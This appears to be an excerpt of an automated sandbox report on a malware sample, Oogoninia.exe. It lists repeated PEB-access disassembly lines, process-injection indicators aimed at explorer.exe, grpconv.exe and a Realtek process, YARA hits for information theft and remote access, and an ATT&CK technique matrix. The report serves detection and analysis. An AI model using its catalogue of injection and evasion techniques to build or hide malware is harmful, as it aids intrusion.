        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AC691 mov eax, dword ptr fs:[00000030h]2_2_325AC691
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF68C mov eax, dword ptr fs:[00000030h]2_2_325DF68C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E86A8 mov eax, dword ptr fs:[00000030h]2_2_325E86A8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E86A8 mov eax, dword ptr fs:[00000030h]2_2_325E86A8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov ecx, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A750 mov eax, dword ptr fs:[00000030h]2_2_3255A750
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CE750 mov eax, dword ptr fs:[00000030h]2_2_325CE750
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32553740 mov eax, dword ptr fs:[00000030h]2_2_32553740
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255174A mov eax, dword ptr fs:[00000030h]2_2_3255174A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550774 mov eax, dword ptr fs:[00000030h]2_2_32550774
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524779 mov eax, dword ptr fs:[00000030h]2_2_32524779
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524779 mov eax, dword ptr fs:[00000030h]2_2_32524779
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561763 mov eax, dword ptr fs:[00000030h]2_2_32561763
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252471B mov eax, dword ptr fs:[00000030h]2_2_3252471B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252471B mov eax, dword ptr fs:[00000030h]2_2_3252471B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF717 mov eax, dword ptr fs:[00000030h]2_2_325DF717
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D700 mov ecx, dword ptr fs:[00000030h]2_2_3252D700
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B705 mov eax, dword ptr fs:[00000030h]2_2_3251B705
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254270D mov eax, dword ptr fs:[00000030h]2_2_3254270D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254270D mov eax, dword ptr fs:[00000030h]2_2_3254270D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254270D mov eax, dword ptr fs:[00000030h]2_2_3254270D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C mov eax, dword ptr fs:[00000030h]2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C mov eax, dword ptr fs:[00000030h]2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252170C mov eax, dword ptr fs:[00000030h]2_2_3252170C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32523722 mov eax, dword ptr fs:[00000030h]2_2_32523722
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32523722 mov eax, dword ptr fs:[00000030h]2_2_32523722
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32549723 mov eax, dword ptr fs:[00000030h]2_2_32549723
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF7CF mov eax, dword ptr fs:[00000030h]2_2_325DF7CF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E7E0 mov eax, dword ptr fs:[00000030h]2_2_3254E7E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325237E4 mov eax, dword ptr fs:[00000030h]2_2_325237E4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32551796 mov eax, dword ptr fs:[00000030h]2_2_32551796
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32551796 mov eax, dword ptr fs:[00000030h]2_2_32551796
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259E79D mov eax, dword ptr fs:[00000030h]2_2_3259E79D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB781 mov eax, dword ptr fs:[00000030h]2_2_325FB781
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325FB781 mov eax, dword ptr fs:[00000030h]2_2_325FB781
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F17BC mov eax, dword ptr fs:[00000030h]2_2_325F17BC
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325207A7 mov eax, dword ptr fs:[00000030h]2_2_325207A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ED7A7 mov eax, dword ptr fs:[00000030h]2_2_325ED7A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ED7A7 mov eax, dword ptr fs:[00000030h]2_2_325ED7A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325ED7A7 mov eax, dword ptr fs:[00000030h]2_2_325ED7A7
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255D450 mov eax, dword ptr fs:[00000030h]2_2_3255D450
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255D450 mov eax, dword ptr fs:[00000030h]2_2_3255D450
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252D454 mov eax, dword ptr fs:[00000030h]2_2_3252D454
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254E45E mov eax, dword ptr fs:[00000030h]2_2_3254E45E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32530445 mov eax, dword ptr fs:[00000030h]2_2_32530445
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528470 mov eax, dword ptr fs:[00000030h]2_2_32528470
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528470 mov eax, dword ptr fs:[00000030h]2_2_32528470
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF478 mov eax, dword ptr fs:[00000030h]2_2_325DF478
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325EA464 mov eax, dword ptr fs:[00000030h]2_2_325EA464
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF409 mov eax, dword ptr fs:[00000030h]2_2_325DF409
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B6400 mov eax, dword ptr fs:[00000030h]2_2_325B6400
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B6400 mov eax, dword ptr fs:[00000030h]2_2_325B6400
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251640D mov eax, dword ptr fs:[00000030h]2_2_3251640D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32557425 mov eax, dword ptr fs:[00000030h]2_2_32557425
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32557425 mov ecx, dword ptr fs:[00000030h]2_2_32557425
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B420 mov eax, dword ptr fs:[00000030h]2_2_3251B420
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A9429 mov eax, dword ptr fs:[00000030h]2_2_325A9429
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AF42F mov eax, dword ptr fs:[00000030h]2_2_325AF42F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F4D0 mov eax, dword ptr fs:[00000030h]2_2_3254F4D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325444D1 mov eax, dword ptr fs:[00000030h]2_2_325444D1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325444D1 mov eax, dword ptr fs:[00000030h]2_2_325444D1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325414C9 mov eax, dword ptr fs:[00000030h]2_2_325414C9
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF4FD mov eax, dword ptr fs:[00000030h]2_2_325DF4FD
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325264F0 mov eax, dword ptr fs:[00000030h]2_2_325264F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A4F0 mov eax, dword ptr fs:[00000030h]2_2_3255A4F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A4F0 mov eax, dword ptr fs:[00000030h]2_2_3255A4F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325494FA mov eax, dword ptr fs:[00000030h]2_2_325494FA
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325554E0 mov eax, dword ptr fs:[00000030h]2_2_325554E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E4EF mov eax, dword ptr fs:[00000030h]2_2_3255E4EF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E4EF mov eax, dword ptr fs:[00000030h]2_2_3255E4EF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255B490 mov eax, dword ptr fs:[00000030h]2_2_3255B490
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255B490 mov eax, dword ptr fs:[00000030h]2_2_3255B490
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AC490 mov eax, dword ptr fs:[00000030h]2_2_325AC490
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520485 mov ecx, dword ptr fs:[00000030h]2_2_32520485
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255648A mov eax, dword ptr fs:[00000030h]2_2_3255648A
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_3255648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_3255648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_3255E4BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325224A2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325224A2 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325AD4A0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325AD4A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325AD4A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325544A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325FB55F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325FB55F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325EA553 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_3253E547 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32556540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32558540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_3252254C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_3253C560 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32541514 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325AC51D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325CF51B mov eax, dword ptr fs:[00000030h]

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\Oogoninia.exe | NtSetContextThread: Indirect: 0x32233749
        Source: C:\Users\user\Desktop\Oogoninia.exe | NtQueueApcThread: Indirect: 0x3222F552
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFEEA0A2651
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x411B8E8
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x41234E2
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x411B727
        Source: C:\Users\user\Desktop\Oogoninia.exe | NtSuspendThread: Indirect: 0x32233A69
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x411B959
        Source: C:\Users\user\Desktop\Oogoninia.exe | NtResumeThread: Indirect: 0x32233D89
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Oogoninia.exe | Section loaded: NULL target: C:\Windows\SysWOW64\grpconv.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
        Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\grpconv.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
        Source: C:\Users\user\Desktop\Oogoninia.exe | Thread register set: target process: 6496
        Source: C:\Windows\SysWOW64\grpconv.exe | Thread register set: target process: 6496
        Source: C:\Users\user\Desktop\Oogoninia.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
        Source: C:\Users\user\Desktop\Oogoninia.exe | Process created: C:\Users\user\Desktop\Oogoninia.exe "C:\Users\user\Desktop\Oogoninia.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
        Source: explorer.exe, 0000000F.00000002.5978085761.0000000001339000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825363719.0000000001339000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman3
        Source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders".lnk%HOMEDRIVE%%HOMEPATH%.pif%USERPROFILE%setup.iniprogman.groupsprogman.onlydesktop.groupsstartup.groupssendto.groupsrecentdocs.groupsSoftware\Microsoft\Windows\CurrentVersionPreConvRenameFilesDeleteFilesRenameFilesSoftware\Microsoft\Windows\CurrentVersion\GrpConv/o-o.grpExceptionReturnHrLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs] [%hs(%hs)]
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2826323511.00000000038E0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825907492.0000000001B51000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825907492.0000000001B51000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: RAVCpl64.exe, 00000004.00000000.1286870284.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.5980029495.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825907492.0000000001B51000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Managerj<1
        Source: Oogoninia.exe, 00000002.00000002.1354974337.000000000225B000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FileDescriptionWindows Progman Group Converterh$
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        MITRE ATT&CK Matrix (one line per tactic; techniques matched by this analysis carry the report's count in parentheses, all other entries are unmatched matrix cells)

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Privilege Escalation: Access Token Manipulation (1); Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        Defense Evasion: Masquerading (12); Virtualization/Sandbox Evasion (2); Access Token Manipulation (1); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (3); System Information Discovery (13); Remote System Discovery; System Owner/User Discovery
